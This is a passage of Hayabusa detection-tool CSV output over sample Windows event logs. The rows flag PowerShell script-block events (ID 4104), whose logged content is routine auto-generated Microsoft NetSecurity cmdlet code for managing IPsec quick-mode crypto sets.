$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 